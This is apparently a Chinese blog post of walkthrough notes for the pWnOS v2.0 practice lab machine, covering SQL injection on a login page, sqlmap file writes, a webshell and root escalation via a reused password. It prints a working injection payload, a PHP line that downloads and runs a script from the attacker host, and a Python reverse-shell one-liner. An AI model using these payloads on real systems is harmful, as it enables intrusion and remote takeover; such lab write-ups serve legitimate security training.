pWnOS v2.0 靶机测试笔记

1 http://10.10.10.100/login.php 存在sql注入
Username: admin@isints.com' and extractvalue(1,concat(0x5c,(select database())))#
Password: x

存在注入,那么sqlmap 跑一下。 保存post数据包


C2c4b4e51d9e23c02c15702c136c3e950ba9a4af
Cmd5收费 somd5给力 密码killerbeesareflying

登录,发现还是这套,之前手工注册登录的也是这个

看来重点不在这儿,尝试sqlmap --os-shell ,发现显示成功但是命令实际并未执行且没有输出

后注意到这儿sqlmap是提供文件上传链接的,

但是尝试上传自己马反弹shell还是不行,查看phpinfo的disable_function 发现没有禁用函数,

说不清哪的问题,但是这个我在oscp中遇到过。 那么换一种方式

<?php system("cd /tmp; wget http://10.10.10.2/python_bd.py; python python_bd.py");?>

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.2",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

sqlmap写入文件

然后浏览器访问3.php ,即可发现nc收到shell了

提权:

有价值的

home目录未发现信息,尝试mysql方向
找到mysql密码

先尝试ssh连接,发现不行

本地登录也不行

最终在上一层目录发现其备份文件。。复制密码尝试su root 直接登录了。。

总结:
1 sqlmap写入文件时会提供一个上传文件的后门链接,如果sqlmap的后门文件无法使用,可使用这个链接再次上传自己的马
2 sqlmap --file-write --file-dest

posted @ 2020-08-07 20:51  总得前行  阅读(525)  评论(0编辑  收藏  举报